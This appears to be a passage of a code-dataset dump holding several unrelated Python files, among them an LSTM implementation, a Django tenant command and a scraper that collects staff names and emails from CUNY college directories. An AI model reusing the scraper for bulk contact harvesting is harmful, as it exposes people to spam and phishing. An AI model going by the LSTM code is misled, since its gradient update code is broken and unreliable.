tr4w.get_keywords(20, word_min_len=2):\n result.append(item.word)\n return result\n\n\ndef is_sim(new1, new2):\n words1 = new1['keywords_temp']\n words2 = new2['keywords_temp']\n repeat = [word for word in words1 if word in words2]\n if words2 and words1 and repeat:\n if len(repeat) > 4 or len(repeat) / (len(words1)) > 0.5 or len(repeat) / (len(words2)) > 0.5:\n return True\n return False\n\n\n@celery_app.task\ndef find_repeat_news():\n \"\"\"\n repeat 1 重复 -1 不重复\n :return:\n \"\"\"\n collection = Mongo().news\n news = list(collection.find({'created_at': {'$gt': time.time() - 3600}}))\n for new in news:\n new['keywords_temp'] = get_keywords(new['content'])\n for new1 in news:\n if new1.get('repeat'):\n new1['state'] = 1\n continue\n for new2 in news:\n if new2['_id'] == new1['_id']:\n continue\n if is_sim(new1, new2):\n new1['repeat'] = 1\n new1['state'] = 1\n break\n if new1.get('state') != 1:\n new1['state'] = 1\n new1['repeat'] = -1\n for new in news:\n new.pop('state')\n new.pop('keywords_temp')\n collection.save(new)\n\n\nif __name__ == '__main__':\n time1 = time.time()\n find_repeat_news()\n print(time.time() - time1)\n","repo_name":"Fern9/newsSpider","sub_path":"tasks/news_repeat/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18524484286","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom cnn import element_wise_op\nfrom activators import SigmoidActivator, TanhActivator, IdentityActivator\nfrom functools import reduce\n\nclass LstmLayer(object):\n def __init__(self, input_width, state_width, learning_rate):\n self.bf_grad = None\n self.Wfx_grad = None\n self.Wfh_grad = None\n self.delta_ct_list = None\n self.delta_f_list = None\n self.delta_i_list = None\n self.delta_o_list = None\n self.delta_h_list = None\n self.input_width = input_width\n self.state_width = state_width\n self.learning_rate = learning_rate\n self.gate_activator = SigmoidActivator()\n self.output_activator = TanhActivator()\n self.times = 0\n # 各个时刻的单元向量c\n self.c_list = self.init_state_vec()\n # 各个时刻的输出向量\n self.h_list = self.init_state_vec()\n # 各个时刻的遗忘门向量\n self.f_list = self.init_state_vec()\n # 各个时刻的输入们向量\n self.i_list = self.init_state_vec()\n # 各个时刻的输出门向量\n self.o_list = self.init_state_vec()\n # 各个时刻的即使状态c~\n self.ct_list = self.init_state_vec()\n # 遗忘门权重矩阵Wfh Wfx 偏置项 bf\n self.Wfh, self.Wfx, self.bf = (\n self.init_weight_mat())\n # 输入门的权重\n self.Wih, self.Wix, self.bi = (\n self.init_weight_mat())\n # 输出门的权重\n self.Woh, self.Wox, self.bo = (\n self.init_weight_mat())\n # 单元状态的权重\n self.Wch, self.Wcx, self.bc = (\n self.init_weight_mat())\n\n def init_state_vec(self):\n \"\"\"\n 初始化保存的向量\n :return:\n \"\"\"\n state_vec_list = []\n state_vec_list.append(np.zeros((self.state_width, 1)))\n return state_vec_list\n\n def init_weight_mat(self):\n \"\"\"\n 初始化保存状态的向量\n :return:\n \"\"\"\n Wh = np.random.uniform(-1e-4, 1e-4, (self.state_width, self.state_width))\n Wx = np.random.uniform(-1e-4, 1e-4, (self.state_width, self.input_width))\n b = np.zeros((self.state_width, 1))\n return Wh, Wx, b\n\n def forward(self, x):\n \"\"\"\n 根据1式-6式进行前向计算\n :param x:\n :return:\n \"\"\"\n self.times += 1\n # 遗忘门\n fg = self.calc_gate(x, self.Wfx, self.Wfh, self.bf, self.gate_activator)\n self.f_list.append(fg)\n # 输入门\n ig = self.calc_gate(x, self.Wix, self.Wih, self.bi, self.gate_activator)\n self.i_list.append(ig)\n # 输出门\n og = self.calc_gate(x, self.Wox, self.Woh, self.bo, self.gate_activator)\n self.o_list.append(og)\n # 即使状态\n ct = self.calc_gate(x, self.Wcx, self.Wch, self.bc, self.output_activator)\n self.ct_list.append(ct)\n # 单元状态\n c = fg * self.c_list[self.times - 1] + ig * ct\n self.c_list.append(c)\n # 输出\n h = og * self.output_activator.forward(c)\n self.h_list.append(h)\n\n def calc_gate(self, x, Wx, Wh, b, activator):\n \"\"\"\n 计算门\n :param x:\n :param Wx:\n :param Wh:\n :param b:\n :param activator:\n :return:\n \"\"\"\n h = self.h_list[self.times - 1] # 上一次的lstm输出\n net = np.dot(Wh, h) + np.dot(Wx, x) + b\n gate = activator.forward(net)\n return gate\n\n def backward(self, x, delta_h, activator):\n \"\"\"\n 实现lstm算法\n :param x:\n :param delta_h:\n :param activator:\n :return:\n \"\"\"\n self.calc_delta(delta_h, activator)\n self.calc_gradient(x)\n\n def update(self):\n \"\"\"\n 按照梯度下降,跟新权重\n :return:\n \"\"\"\n self.Wfh -= self.learning_rate * self.Whf_grad\n self.Wfx -= self.learning_rate * self.Whx_grad\n self.bf -= self.learning_rate * self.bf_grad\n self.Wih -= self.learning_rate * self.Whi_grad\n self.Wix -= self.learning_rate * self.Whi_grad\n self.bi -= self.learning_rate * self.bi_grad\n self.Woh -= self.learning_rate * self.Wof_grad\n self.Wox -= self.learning_rate * self.Wox_grad\n self.bo -= self.learning_rate * self.bo_gard\n self.Wch -= self.learning_rate * self.Wcf_grad\n self.Wcx -= self.learning_rate * self.Wcx_grad\n self.bc -= self.learning_rate * self.bc_grad\n\n def calc_delta(self, delta_h, activator):\n # 初始化各个时刻的误差项\n self.delta_h_list = self.init_delta()\n self.delta_o_list = self.init_delta()\n self.delta_i_list = self.init_delta()\n self.delta_f_list = self.init_delta()\n self.delta_ct_list = self.init_delta()\n\n # 保存从上一层传递下来的当前时刻的误差项\n self.delta_h_list[-1] = delta_h\n\n # 迭代计算每个时刻的误差项\n for k in range(self.times, 0, -1):\n self.calc_delta_k(k)\n\n def init_delta(self):\n \"\"\"\n 初始化误差项\n :return: \n \"\"\"\n delta_list = []\n for i in range(self.times + 1):\n delta_list.append(\n np.zeros(\n (self.state_width, 1)\n )\n )\n return delta_list\n\n def calc_delta_k(self, k):\n \"\"\"\n 根据k时刻delta_h, 计算k时刻delta_f\n delta_i, delta_o, delta_ct, 以及k-1时刻的delta_h\n :param k: \n :return: \n \"\"\"\n # 获得k时刻向前计算的值\n ig = self.i_list[k]\n og = self.o_list[k]\n fg = self.f_list[k]\n ct = self.ct_list[k]\n c = self.c_list[k]\n c_prev = self.c_list[k - 1]\n tanh_c = self.output_activator.forward(c)\n delta_k = self.delta_h_list[k]\n\n # 根据式9 计算delta_o\n delta_o = (delta_k * tanh_c * self.gate_activator.backward(og))\n delta_f = (delta_k * og * (1 - tanh_c * tanh_c) * c_prev * self.gate_activator.backward(fg))\n delta_i = (delta_k * og * (1 - tanh_c * tanh_c) * ct * self.gate_activator.backward(ig))\n delta_ct = (delta_k * og * (1 - tanh_c * tanh_c) * ig * self.output_activator.backward(ct))\n delta_h_prew = (\n np.dot(delta_o.transpose(), self.Woh) +\n np.dot(delta_i.transpose(), self.Wih) +\n np.dot(delta_f.transpose(), self.Wfh) +\n np.dot(delta_ct.transpose(), self.Wch)\n ).transpose()\n\n # 保存全部的delta值\n self.delta_h_list[k - 1] = delta_h_prew\n self.delta_f_list[k] = delta_f\n self.delta_i_list[k] = delta_i\n self.delta_o_list[k] = delta_k\n self.delta_ct_list[k] = delta_ct\n\n def calc_gradient(self, x):\n # 初始化遗忘门权重梯度\n self.Wfh_grad, self.Wfx_grad, self.bf_grad = (self.init_weight_gradient_mat())\n # 初始化输入门权重梯度矩阵和偏置项\n self.Wih_grad, self.Wix_grad, self.bi_grad = (self.init_weight_gradient_mat())\n # 初始化输出门权重矩阵和偏置项\n self.Woh_grad, self.Wox_grad, self.bo_grad = (self.init_weight_gradient_mat())\n # 初始化单元状态权重矩阵和偏置项\n self.Wch_grad, self.Wcx_grad, self.bc_grad = (self.init_weight_gradient_mat())\n\n # 计算对上一个输出h的权重梯度\n for t in range(self.times, 0, -1):\n # 计算各个时刻的梯度\n (Wfh_grad, bf_grad, Wih_grad, bi_grad, Woh_grad, bo_grad, Wch_grad, bc_grad) = (self.calc_gradient_t(t))\n # 实际梯度是各时刻梯度之和\n self.Wfh_grad += Wfh_grad\n self.bf_grad += bf_grad\n self.Wih_grad += Wfh_grad\n self.bi_grad += bi_grad\n self.Woh_grad += Woh_grad\n self.bo_grad += bo_grad\n self.Wch_grad += Wch_grad\n self.bc_grad += bc_grad\n\n # 计算对本次输入x的权重梯度\n xt = x.transpose()\n self.Wfx_grad = np.dot(self.delta_f_list[-1], xt)\n self.Wix_grad = np.dot(self.delta_i_list[-1], xt)\n self.Wox_grad = np.dot(self.delta_o_list[-1], xt)\n self.Wcx_grad = np.dot(self.delta_ct_list[-1], xt)\n\n def init_weight_gradient_mat(self):\n \"\"\"\n 初始化权重矩阵\n :return:\n \"\"\"\n Wh_grad = np.zeros((self.state_width, self.state_width))\n Wx_grad = np.zeros((self.state_width, self.input_width))\n b_grad = np.zeros((self.state_width, 1))\n return Wh_grad, Wx_grad, b_grad\n\n def calc_gradient_t(self, t):\n \"\"\"\n 计算每个时刻t权重的梯度\n :param t:\n :return:\n \"\"\"\n h_prev = self.h_list[t - 1].transpose()\n Wfh_grad = np.dot(self.delta_f_list[t], h_prev)\n bf_grad = self.delta_f_list[t]\n Wih_grad = np.dot(self.delta_i_list[t], h_prev)\n bi_grad = self.delta_f_list[t]\n Woh_grad = np.dot(self.delta_o_list[t], h_prev)\n bo_grad = self.delta_f_list[t]\n Wch_grad = np.dot(self.delta_ct_list[t], h_prev)\n bc_grad = self.delta_ct_list[t]\n return Wfh_grad, bf_grad, Wih_grad, bi_grad, Woh_grad, bo_grad, Wch_grad, bc_grad\n\n def reset_state(self):\n # 计算当前时刻初始化为t0\n self.times = 0\n # 各个时刻的单元状态向量c\n self.c_list = self.init_state_vec()\n # 各个时刻的输出向量h\n self.h_list = self.init_state_vec()\n # 各个时刻的遗忘门f\n self.f_list = self.init_state_vec()\n # 各个时刻的输入门i\n self.i_list = self.init_state_vec()\n # 各个时刻的输出门o\n self.o_list = self.init_state_vec()\n # 各个时刻的即时状态\n self.ct_list = self.init_state_vec()\n\n\ndef data_set():\n x = [\n np.array([[1], [2], [3]]),\n np.array([[2], [3], [4]])\n ]\n d = np.array([[1], [2]])\n return x, d\n\n\ndef gradient_check():\n \"\"\"\n 梯度检查\n :return:\n \"\"\"\n error_function = lambda o: o.sum()\n\n lstm = LstmLayer(3, 2, 1e-3)\n\n # 计算forward值\n x, d = data_set()\n lstm.forward(x[0])\n lstm.forward(x[1])\n\n # 求取sensitivity map\n sensitivity_array = np.ones(lstm.h_list[-1].shape, dtype=np.float64)\n\n # 计算梯度\n lstm.backward(x[1], sensitivity_array, IdentityActivator())\n\n # 检查梯度\n epsilon = 10e-4\n for i in range(lstm.Wfh.shape[0]):\n for j in range(lstm.Wfh.shape[1]):\n lstm.Wfh[i, j] += epsilon\n lstm.reset_state()\n lstm.forward(x[0])\n lstm.forward(x[1])\n err1 = error_function(lstm.h_list[-1])\n lstm.Wfh[i, j] -= 2 * epsilon\n lstm.reset_state()\n lstm.forward(x[0])\n lstm.forward(x[1])\n err2 = error_function(lstm.h_list[-1])\n expect_grad = (err1 - err2) / (2 * epsilon)\n lstm.Wfh[i, j] += epsilon\n print('weights(%d, %d):expected - actural %.4e - %.4e' % (i, j, expect_grad, lstm.Wfh_grad[i, j]))\n return lstm\n\n\ndef test():\n l = LstmLayer(3, 2, 1e-3)\n x, d = data_set()\n l.forward(x[0])\n l.forward(x[1])\n l.backward(x[1], d, IdentityActivator())\n gradient_check()\n return l\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"OX915/NewFishLearning","sub_path":"FoundamentalsOfDeepLearning/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":11510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71627347332","text":"from django.core.management.base import BaseCommand\n\nfrom organization.services.organization_service import OrganizationService\nfrom tenant.services.tenant_service import TenantService\n\n\nclass Command(BaseCommand):\n help = \"Tenant Manager\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"-c\",\n \"--create\",\n action=\"store_true\",\n help=\"Create a tenant\",\n )\n parser.add_argument(\n \"-d\",\n \"--delete\",\n action=\"store_true\",\n help=\"Delete a tenant.\",\n )\n parser.add_argument(\n \"-ud\",\n \"--undelete\",\n action=\"store_true\",\n help=\"UnDelete a tenant.\",\n )\n\n parser.add_argument(\n \"--tenant_id\",\n help=\"Specify a tenant id.\",\n )\n parser.add_argument(\n \"--organization_name\",\n help=\"Specify a organization name.\",\n )\n parser.add_argument(\n \"--subdomain\",\n help=\"Specify a subdomain.\",\n )\n parser.add_argument(\n \"--email\",\n help=\"Specify an email.\",\n )\n parser.add_argument(\n \"--password\",\n help=\"Specify a password.\",\n )\n\n def handle(self, *args, **options):\n if options.get(\"c\") or options.get(\"create\"):\n if (\n options.get(\"subdomain\")\n and options.get(\"organization_name\")\n and options.get(\"email\")\n and options.get(\"password\")\n ):\n subdomain = options.get(\"subdomain\")\n organization_name = options.get(\"organization_name\")\n email = options.get(\"email\")\n password = options.get(\"password\")\n\n tenant_service = TenantService()\n result, tenant = tenant_service.create_tenant(\n subdomain=subdomain,\n email=email,\n )\n\n if result:\n organization_service = OrganizationService()\n result = organization_service.initiate_schema(\n schema_name=tenant.schema_name,\n organization_name=organization_name,\n email=email,\n password=password,\n )\n\n if result:\n self.stdout.write(\n self.style.SUCCESS(\"Successfully create a tenant!\")\n )\n else:\n self.stdout.write(self.style.SUCCESS(\"Can not create a tenant!\"))\n else:\n self.stdout.write(\n self.style.ERROR(\"Please provide the correct option.\")\n )\n\n elif options.get(\"d\") or options.get(\"delete\"):\n if options.get(\"tenant_id\"):\n tenant_id = options.get(\"tenant_id\")\n\n tenant_service = TenantService()\n result = tenant_service.delete_tenant(\n tenant_id=tenant_id,\n )\n\n if result:\n self.stdout.write(\n self.style.SUCCESS(\"Successfully delete a tenant!\")\n )\n else:\n self.stdout.write(self.style.SUCCESS(\"Can not delete a tenant!\"))\n else:\n self.stdout.write(\n self.style.ERROR(\"Please provide the correct option.\")\n )\n\n elif options.get(\"ud\") or options.get(\"undelete\"):\n if options.get(\"tenant_id\"):\n tenant_id = options.get(\"tenant_id\")\n\n organization_service = TenantService()\n result = organization_service.undelete_tenant(\n tenant_id=tenant_id,\n )\n\n if result:\n self.stdout.write(\n self.style.SUCCESS(\"Successfully undelete a tenant!\")\n )\n else:\n self.stdout.write(self.style.SUCCESS(\"Can not undelete a tenant!\"))\n else:\n self.stdout.write(\n self.style.ERROR(\"Please provide the correct option.\")\n )\n\n else:\n self.stdout.write(self.style.ERROR(\"Please provide the correct option.\"))\n","repo_name":"walkerchiu/django-docker-saas-starter","sub_path":"app/tenant/management/commands/tenant_manager.py","file_name":"tenant_manager.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1290593187","text":"'''\nCreated on 21. 7. 2023\n\n@author: valic\n'''\nfrom itertools import combinations\n\nif __name__ == '__main__':\n a = input().split()\n s = a[0]\n n = int(a[1])\n \n s = ''.join(sorted(s))\n combins = []\n for i in range(1, n+1) :\n combins.append(list(combinations(s,i)))\n \n results = []\n for tpls in combins:\n for t in tpls:\n results.append(t)\n for r in results: \n print( ''.join(r), end = '\\n')\n","repo_name":"valiclud/python-projects","sub_path":"Hackerrank/main/intertools-combination.py","file_name":"intertools-combination.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71411902854","text":"# Simple Python 3 script to plot waveform profile[0] from the specified EEPROM dump.\n\n# Usage: python ir-remote-eeprom-map.py [bin-file]\n# Example: python ir-remote-eeprom-map.py test.bin\n\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport sys\n\nfilename = \"\"\ndata_unit_len = 10\n\nif len(sys.argv) < 2:\n\tprint(\"Usage: ir-remote-eeprom-map.py [BIN-FILE]\")\n\texit()\nelse:\n\tfilename = sys.argv[1]\n\nwith open(filename, \"rb\") as binfile:\n\trec_size = ord(binfile.read(1))\n\t\n\tprint(\"Number of records: \" + str(rec_size))\n\t\n\ttime_data = []\n\tfilepos = 0\n\t\n\t# Read 16-bit data set of the first waveform.\n\twhile(filepos < rec_size):\n\t\ttemp_data = ord(binfile.read(1)) << 8\n\t\ttemp_data = temp_data | ord(binfile.read(1)) \n\t\t\n\t\tfilepos = filepos + 1\n\t\tprint(hex(temp_data), end =\" \")\n\t\t\n\t\ttime_data.append(temp_data)\n\t\t\n\tprint(\"\")\n\tprint(\"File reading is completed\")\n\t\nif len(time_data) > 0 :\n\tplot_data = [0]\n\tis_zero = 0\n\t\n\trecpos = 0\n\twhile(recpos < len(time_data)):\n\t\tcurr_data = time_data[recpos]\n\t\t\n\t\t# Generating square waveform.\n\t\twhile(curr_data > 0):\n\t\t\tplot_data.append(is_zero)\n\t\t\tcurr_data = curr_data - data_unit_len\n\t\t\t\n\t\trecpos = recpos + 1\n\n\t\t# Determine the next logic level.\n\t\tif is_zero == 0:\n\t\t\tis_zero = 1\n\t\telse:\n\t\t\tis_zero = 0\n\t\t\t\nxs = np.repeat(range(len(plot_data)), 2)\nys = np.repeat(plot_data, 2)\nxs = xs[1:]\nys = ys[:-1]\n\nplot.plot(xs, ys)\nplot.ylim(-0.5, 1.5)\nplot.show()","repo_name":"dilshan/ir-clone","sub_path":"python-test/ir-remote-eeprom-map.py","file_name":"ir-remote-eeprom-map.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"44"} +{"seq_id":"2696303706","text":"from __future__ import print_function, division\nimport os\nimport argparse\nimport sys\nimport torch\nimport pretrainedmodels\nimport pretrainedmodels.utils\nimport pretrainedmodels.datasets as datasets\nimport h5py\n\nmodel_names = sorted(name for name in pretrainedmodels.__dict__\n if not name.startswith(\"__\")\n and name.islower()\n and callable(pretrainedmodels.__dict__[name]))\nparser = argparse.ArgumentParser(\n description='ImageNet Feature Extraction',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--dir_outputs', default='./outputs.h5', type=str, help='')\nparser.add_argument('--dir_datasets', default='/tmp/datasets', type=str, help='')\nparser.add_argument('-b', '--batch_size', default=30, type=float, help='')\nparser.add_argument('-a', '--arch', default='alexnet', choices=model_names,\n help='model architecture: ' +\n ' | '.join(model_names) +\n ' (default: alexnet)')\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--cuda', const=True, nargs='?', type=bool, help='')\nargs = parser.parse_args()\ndef main():\n pass\n\nif __name__ == '__main__':\n\n model = pretrainedmodels.__dict__[args.arch]()\n features_size = model.last_linear.in_features\n model.last_linear = pretrainedmodels.utils.Identity() \n scale = 0.875\n val_tf = pretrainedmodels.utils.TransformImage(\n model,\n scale=scale,\n preserve_aspect_ratio=True\n )\n dataset = datasets.ExtractionDatasetFolder(args.dir_datasets,\n val_tf)\n total = len(dataset)\n val_loader = torch.utils.data.DataLoader(\n dataset,\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True)\n if os.path.exists(args.dir_outputs):\n raise RuntimeError('{} file exits'.format(args.dir_outputs))\n df = h5py.File(args.dir_outputs,'w')\n dst = df.create_dataset(\"features\",(total, features_size),dtype='float32')\n with torch.no_grad():\n for ind, (img, label) in enumerate(val_loader):\n out = model(img)\n dst[ind*args.batch_size:(ind+1)*args.batch_size, :] = out\n print('{}/{}'.format(min((ind+1)*args.batch_size,total), total))\n\n df.close()\n","repo_name":"shykoe/ImageClassification","sub_path":"feature_extract.py","file_name":"feature_extract.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5219397369","text":"from promogest import Environment\nfrom promogest.lib.utils import *\nfrom promogest.ui.gtk_compat import *\nfrom promogest.modules.PromoWear.ui.PromowearUtils import *\n\ndef hidePromoWear(ui):\n \"\"\" Hide and destroy labels and button if promowear is not present\n \"\"\"\n ui.promowear_manager_taglia_colore_togglebutton.destroy()\n ui.promowear_manager_taglia_colore_image.hide()\n ui.anno_label.destroy()\n ui.label_anno.destroy()\n ui.stagione_label.destroy()\n ui.label15.destroy()\n ui.colore_label.destroy()\n ui.label14.destroy()\n ui.taglia_label.destroy()\n ui.label_taglia.destroy()\n ui.gruppo_taglia_label.destroy()\n ui.label_gruppo_taglia.destroy()\n ui.tipo_label.destroy()\n ui.label_tipo.destroy()\n\n\ndef setLabelInfo(ui):\n \"\"\" Setta a stringa vuota le info specifiche dell'articolo promowear\n \"\"\"\n ui.gruppo_taglia_label.set_markup('%s' % ('',))\n ui.taglia_label.set_markup('%s' % ('',))\n ui.colore_label.set_markup('%s' % ('',))\n ui.stagione_label.set_markup('%s' % ('',))\n ui.anno_label.set_markup('%s' % ('',))\n ui.tipo_label.set_markup('%s' % ('',))\n\ndef fillLabelInfo(ui, articolo):\n ui.gruppo_taglia_label.set_markup('%s' % (articolo['gruppoTaglia']))\n ui.taglia_label.set_markup('%s' % (articolo['taglia']))\n ui.colore_label.set_markup('%s' % (articolo['colore']))\n ui.stagione_label.set_markup('%s' % (articolo['stagione']))\n ui.anno_label.set_markup('%s' % (articolo['anno']))\n ui.tipo_label.set_markup('%s' % (\"\"))\n\ndef azzeraRiga(anaedit, numero):\n anaedit._righe[numero].update(idGruppoTaglia = None,\n gruppoTaglia = '',\n idTaglia = None,\n taglia = '',\n idColore = None,\n colore = '',\n idAnno = None,\n anno = '',\n idStagione = None,\n stagione = '',\n idGenere = None,\n genere = '')\n","repo_name":"francescomeloni/promogest","sub_path":"core/promogest/modules/PromoWear/ui/AnagraficaDocumentiEditPromoWearExt.py","file_name":"AnagraficaDocumentiEditPromoWearExt.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"74141507971","text":"import undetected_chromedriver as webdriver\n# from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom utils import _wait_for_element\nfrom loguru import logger\nfrom bs4 import BeautifulSoup\nimport threading\nimport string\nimport csv\nimport http.client\nimport json\n\n\ndef LaGuardia_spider_task(letter):\n options = webdriver.ChromeOptions()\n # options.add_argument(\"--headless\")\n driver = webdriver.Chrome(options=options)\n driver.get('https://apps.laguardia.edu/directory/')\n if _wait_for_element(driver, 'txtFirstName', 'id', 10):\n first_name_input = driver.find_element(By.ID, 'txtFirstName')\n first_name_input.send_keys(letter)\n confirm_button = driver.find_element(By.NAME, 'txtSearch')\n driver.execute_script(\"arguments[0].click();\", confirm_button)\n if _wait_for_element(driver, 'outputDataGrid', 'id', 10):\n table_element = driver.find_element(By.ID, 'outputDataGrid')\n teacher_data = []\n soup = BeautifulSoup(table_element.get_attribute('innerHTML'), 'html.parser')\n\n # Iterate through each row in the table\n for row in soup.find_all('tr')[1:]: # Skip the header row (index 0)\n columns = row.find_all('td')\n\n # Extract the desired information (First Name, Last Name, and Email)\n first_name = columns[0].text.strip()\n last_name = columns[1].text.strip()\n email = columns[6].text.strip()\n\n # Append the data as a tuple to the teacher_data list\n teacher_data.append((first_name, last_name, email))\n\n # Write the data to a CSV file\n with open('teacher.csv', 'a', newline='') as csvfile:\n csv_writer = csv.writer(csvfile)\n csv_writer.writerow(['First Name', 'Last Name', 'Email']) # Write header row\n csv_writer.writerows(teacher_data) # Write the extracted data rows\n driver.close()\n\n\ndef BMCC_spider_tast(letter):\n options = webdriver.ChromeOptions()\n driver = webdriver.Chrome(options=options)\n driver.get('https://www.bmcc.cuny.edu/directory/')\n if _wait_for_element(driver, 'first-name', 'id', 10):\n first_name_input = driver.find_element(By.ID, 'first-name')\n first_name_input.send_keys(letter)\n confirm_button = driver.find_element(By.XPATH, '//button[text()=\"Search\"]')\n driver.execute_script(\"arguments[0].click();\", confirm_button)\n if _wait_for_element(driver, 'entry-content', 'class', 10):\n table_element = driver.find_element(By.CLASS_NAME, 'entry-content')\n teacher_data = []\n soup = BeautifulSoup(table_element.get_attribute('innerHTML'), 'html.parser')\n\n person_entries = soup.find_all('div', class_='dir-person-list-entry')\n\n # Iterate through each person entry and extract the desired information\n for person in person_entries:\n try:\n name_element = person.find('div', class_='dir-person-name')\n first_name, last_name = name_element.h3.text.strip().split(maxsplit=1)\n\n email_element = person.find('div', class_='dir-person-email')\n email = email_element.find('span', class_='dir-field-title').find_next_sibling('span').text.strip()\n\n teacher_data.append([first_name, last_name, email])\n except Exception as e:\n continue\n\n # Write the data to a CSV file\n output_file = \"teacher.csv\"\n with open(output_file, 'a', newline='') as csvfile:\n csv_writer = csv.writer(csvfile)\n csv_writer.writerows(teacher_data) # Write the extracted data rows\n\n driver.close()\n\n\ndef Bronx_spider(letter):\n conn = http.client.HTTPSConnection(\"ra.bcc.cuny.edu\")\n payload = '{{\"fname\": \"John\", \"lname\": \"Doe\", \"deptID\": \"\", \"ch\": \"{}\", \"func\": \"\", \"phExt\": \"\"}}'.format(letter)\n headers = {\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.188',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Host': 'ra.bcc.cuny.edu',\n 'Connection': 'keep-alive'\n }\n conn.request(\"POST\", \"/BCCAPI/Service.asmx/GetBCCEmplDirectorySearch\", payload, headers)\n res = conn.getresponse()\n data = res.read()\n res_str = data.decode(\"utf-8\")\n\n # 解析 JSON 响应\n json_data = json.loads(res_str)\n\n # 提取字段并保存到CSV文件\n with open('teacher.csv', 'a', newline='') as csvfile:\n fieldnames = ['First Name', 'Last Name', 'Email']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n for employee in json_data['d']:\n full_name = employee['EMPL_NAME']\n first_name, last_name = full_name.split(', ', 1)\n email = employee['EMPL_EMAIL']\n\n writer.writerow({'First Name': first_name, 'Last Name': last_name, 'Email': email})\n\n\ndef Stella_spider_task():\n options = webdriver.ChromeOptions()\n driver = webdriver.Chrome(options=options)\n driver.get('https://guttman.cuny.edu/about/directory/#offices')\n if _wait_for_element(driver, \"vc_tta-panel-body\", \"class\", 10):\n table_element = driver.find_element(By.CLASS_NAME, 'vc_tta-panel-body')\n soup = BeautifulSoup(table_element.get_attribute('innerHTML'), 'html.parser')\n with open('teacher.csv', 'w', newline='') as csvfile:\n fieldnames = ['First Name', 'Last Name', 'Email']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n # 查找所有的h3标签,这里假设所有的h3标签都包含了名字信息\n h3_tags = soup.find_all('h3')\n\n for h3_tag in h3_tags:\n try:\n # 获取名字信息\n full_name = h3_tag.get_text()\n first_name, last_name = full_name.split(' ', 1)\n\n # 获取邮箱信息\n email_tag = h3_tag.find_next('a')\n email = email_tag['href'].split(':')[1]\n\n # 写入CSV文件\n writer.writerow({'First Name': first_name, 'Last Name': last_name, 'Email': email})\n except Exception as e:\n continue\n driver.get('https://guttman.cuny.edu/about/directory/#fsa')\n if _wait_for_element(driver, \"GuttmanDirectory_wrapper\", \"id\", 10):\n table_element = driver.find_element(By.XPATH, \"//tbody\")\n soup = BeautifulSoup(table_element.get_attribute('innerHTML'), 'html.parser')\n # 提取字段并保存到CSV文件\n with open('teacher.csv', 'a', newline='') as csvfile:\n fieldnames = ['First Name', 'Last Name', 'Email']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n # 查找所有的tr标签\n rows = soup.find_all('tr')\n for row in rows:\n # 查找h2标签,并获取名字\n name_tag = row.find('h2')\n full_name = name_tag.get_text()\n first_name, last_name = full_name.split(' ', 1)\n # 查找a标签,并获取邮箱\n email_tag = row.find('a')\n email = email_tag['href'].split(':')[1]\n # 写入CSV文件\n writer.writerow({'First Name': first_name, 'Last Name': last_name, 'Email': email})\n\n\ndef Kingsborough_spider():\n html_data = \"\"\"请输入html\"\"\"\n\n # 解析HTML数据\n soup = BeautifulSoup(html_data, \"html.parser\")\n\n # 提取字段并保存到CSV文件\n with open('teacher.csv', 'a', newline='') as csvfile:\n fieldnames = ['First Name', 'Last Name', 'Email']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n # 查找所有的标签中的标签,这里假设每个标签都包含了一个人的信息\n rows = soup.select('tbody tr')\n\n for row in rows:\n # 获取姓名信息\n name_cell = row.select_one('td:nth-of-type(1)')\n full_name = name_cell.get_text()\n first_name, last_name = full_name.split(' ', 1)\n\n # 获取邮箱信息\n email_cell = row.select_one('td:nth-of-type(2)')\n email = email_cell.get_text()\n\n # 写入CSV文件\n writer.writerow({'First Name': first_name, 'Last Name': last_name, 'Email': email})\n\n\nif __name__ == '__main__':\n thread_arr = []\n uppercase_letters = string.ascii_uppercase\n # Stella_spider_task()\n Kingsborough_spider()\n # for letter in uppercase_letters:\n # LaGuardia_spider_task(letter)\n # BMCC_spider_tast(letter)\n # Bronx_spider(letter)\n","repo_name":"Wchvan/spider","sub_path":"laguardia_spider.py","file_name":"laguardia_spider.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11808891220","text":"import click\n\nfrom menus.manipulatemenu import manipulate_menu\nfrom 